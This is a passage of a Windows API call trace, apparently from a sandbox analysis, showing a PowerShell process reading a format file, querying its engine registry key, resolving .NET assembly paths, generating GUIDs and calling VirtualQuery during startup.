	[0164.954] SetErrorMode (uMode=0x1) returned 0x1
	[0164.954] GetFileType (hFile=0x32c) returned 0x1
	[0164.954] ReadFile (in: hFile=0x32c, lpBuffer=0x32b5cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x32b5cd0*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0164.955] ReadFile (in: hFile=0x32c, lpBuffer=0x32b5cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x32b5cd0*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0164.956] ReadFile (in: hFile=0x32c, lpBuffer=0x32b5cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x32b5cd0*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0164.956] ReadFile (in: hFile=0x32c, lpBuffer=0x32b5cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x32b5cd0*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0164.957] ReadFile (in: hFile=0x32c, lpBuffer=0x32b5cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x32b5cd0*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0164.957] ReadFile (in: hFile=0x32c, lpBuffer=0x32b5cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x32b5cd0*, lpNumberOfBytesRead=0x29d488*=0x1000, lpOverlapped=0x0) returned 1
	[0164.957] ReadFile (in: hFile=0x32c, lpBuffer=0x32b5cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x32b5cd0*, lpNumberOfBytesRead=0x29d488*=0xaca, lpOverlapped=0x0) returned 1
	[0164.957] ReadFile (in: hFile=0x32c, lpBuffer=0x32b5302, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x32b5302*, lpNumberOfBytesRead=0x29d488*=0x0, lpOverlapped=0x0) returned 1
	[0164.957] ReadFile (in: hFile=0x32c, lpBuffer=0x32b5cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29d488, lpOverlapped=0x0 | out: lpBuffer=0x32b5cd0*, lpNumberOfBytesRead=0x29d488*=0x0, lpOverlapped=0x0) returned 1
	[0164.958] CloseHandle (hObject=0x32c) returned 1
	[0164.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0164.958] SetErrorMode (uMode=0x1) returned 0x1
	[0164.958] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x29d430 | out: lpFileInformation=0x29d430*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0164.958] SetErrorMode (uMode=0x1) returned 0x1
	[0164.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0164.958] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d518 | out: phkResult=0x29d518*=0x32c) returned 0x0
	[0164.958] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29d49c, lpData=0x0, lpcbData=0x29d498*=0x0 | out: lpType=0x29d49c*=0x1, lpData=0x0, lpcbData=0x29d498*=0x56) returned 0x0
	[0164.958] CoTaskMemAlloc (cb=0x5a) returned 0x4588b0
	[0164.958] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29d46c, lpData=0x4588b0, lpcbData=0x29d468*=0x56 | out: lpType=0x29d46c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x29d468*=0x56) returned 0x0
	[0164.958] CoTaskMemFree (pv=0x4588b0) 
	[0164.958] RegCloseKey (hKey=0x32c) returned 0x0
	[0164.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0164.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0164.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0164.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0164.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0164.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0174.184] VirtualQuery (in: lpAddress=0x29bfb0, lpBuffer=0x29ce70, dwLength=0x30 | out: lpBuffer=0x29ce70*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.185] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0xffb5a34e, Data2=0x9bc6, Data3=0x4367, Data4=([0]=0x95, [1]=0x9e, [2]=0x7e, [3]=0xaa, [4]=0xb6, [5]=0xd8, [6]=0x8a, [7]=0x46))) returned 0x0
	[0174.186] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x24a954e4, Data2=0x547b, Data3=0x4e18, Data4=([0]=0xb1, [1]=0x33, [2]=0x6a, [3]=0x3d, [4]=0x63, [5]=0x3, [6]=0x29, [7]=0xbc))) returned 0x0
	[0174.187] VirtualQuery (in: lpAddress=0x29c160, lpBuffer=0x29d020, dwLength=0x30 | out: lpBuffer=0x29d020*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.187] VirtualQuery (in: lpAddress=0x29c160, lpBuffer=0x29d020, dwLength=0x30 | out: lpBuffer=0x29d020*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.189] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0xff3bf45c, Data2=0xa88, Data3=0x4f4b, Data4=([0]=0xb5, [1]=0x5b, [2]=0x8f, [3]=0xe, [4]=0x6c, [5]=0x8e, [6]=0xa7, [7]=0xb0))) returned 0x0
	[0174.191] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x78407713, Data2=0x34d9, Data3=0x4938, Data4=([0]=0xa3, [1]=0xa1, [2]=0x8e, [3]=0xa9, [4]=0x8b, [5]=0x35, [6]=0x5a, [7]=0x64))) returned 0x0
	[0174.192] VirtualQuery (in: lpAddress=0x29c3b0, lpBuffer=0x29d270, dwLength=0x30 | out: lpBuffer=0x29d270*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.195] VirtualQuery (in: lpAddress=0x29ba20, lpBuffer=0x29c8e0, dwLength=0x30 | out: lpBuffer=0x29c8e0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.829] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x614e1082, Data2=0x86b2, Data3=0x4df4, Data4=([0]=0xa1, [1]=0x3d, [2]=0xd, [3]=0x40, [4]=0x6e, [5]=0x19, [6]=0xb3, [7]=0x93))) returned 0x0
	[0174.830] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0xd854ebea, Data2=0x1261, Data3=0x4324, Data4=([0]=0x9d, [1]=0x1e, [2]=0x3f, [3]=0x5c, [4]=0x5b, [5]=0x45, [6]=0xcb, [7]=0xff))) returned 0x0
	[0174.831] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x850a35dd, Data2=0x6190, Data3=0x4df6, Data4=([0]=0xa0, [1]=0x60, [2]=0x6e, [3]=0x8d, [4]=0x38, [5]=0x10, [6]=0xeb, [7]=0x43))) returned 0x0
	[0174.831] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x829b276d, Data2=0xda72, Data3=0x4470, Data4=([0]=0x9b, [1]=0x38, [2]=0xe5, [3]=0x9b, [4]=0xf4, [5]=0x40, [6]=0xcb, [7]=0x3f))) returned 0x0
	[0174.832] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x28079bb0, Data2=0x1981, Data3=0x49c1, Data4=([0]=0x91, [1]=0x9f, [2]=0xad, [3]=0x20, [4]=0xe2, [5]=0x4, [6]=0x58, [7]=0x80))) returned 0x0
	[0174.832] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0xbeaa51cd, Data2=0xb899, Data3=0x4dd1, Data4=([0]=0xbb, [1]=0x34, [2]=0x12, [3]=0xcc, [4]=0xfb, [5]=0x1c, [6]=0xa2, [7]=0x68))) returned 0x0
	[0174.832] VirtualQuery (in: lpAddress=0x29c0f0, lpBuffer=0x29cfb0, dwLength=0x30 | out: lpBuffer=0x29cfb0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.833] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0xfc6256aa, Data2=0xb5ab, Data3=0x4c50, Data4=([0]=0xa4, [1]=0x74, [2]=0xc6, [3]=0x70, [4]=0x68, [5]=0x1, [6]=0x3d, [7]=0x82))) returned 0x0
	[0174.833] VirtualQuery (in: lpAddress=0x29c0f0, lpBuffer=0x29cfb0, dwLength=0x30 | out: lpBuffer=0x29cfb0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.834] VirtualQuery (in: lpAddress=0x29c0f0, lpBuffer=0x29cfb0, dwLength=0x30 | out: lpBuffer=0x29cfb0*(BaseAddress=0x29c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0184.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.360] CoCreateGuid (in: pguid=0x29d740 | out: pguid=0x29d740*(Data1=0x9ed76ba0, Data2=0xbbc4, Data3=0x414b, Data4=([0]=0x93, [1]=0xa9, [2]=0x56, [3]=0x9b, [4]=0x1c, [5]=0x1a, [6]=0x69, [7]=0x34))) returned 0x0
	[0184.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0184.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.039] VirtualQuery (in: lpAddress=0x29b750, lpBuffer=0x29c610, dwLength=0x30 | out: lpBuffer=0x29c610*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.040] VirtualQuery (in: lpAddress=0x29b7e0, lpBuffer=0x29c6a0, dwLength=0x30 | out: lpBuffer=0x29c6a0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.041] VirtualQuery (in: lpAddress=0x29bf60, lpBuffer=0x29ce20, dwLength=0x30 | out: lpBuffer=0x29ce20*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.042] VirtualQuery (in: lpAddress=0x29bf60, lpBuffer=0x29ce20, dwLength=0x30 | out: lpBuffer=0x29ce20*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
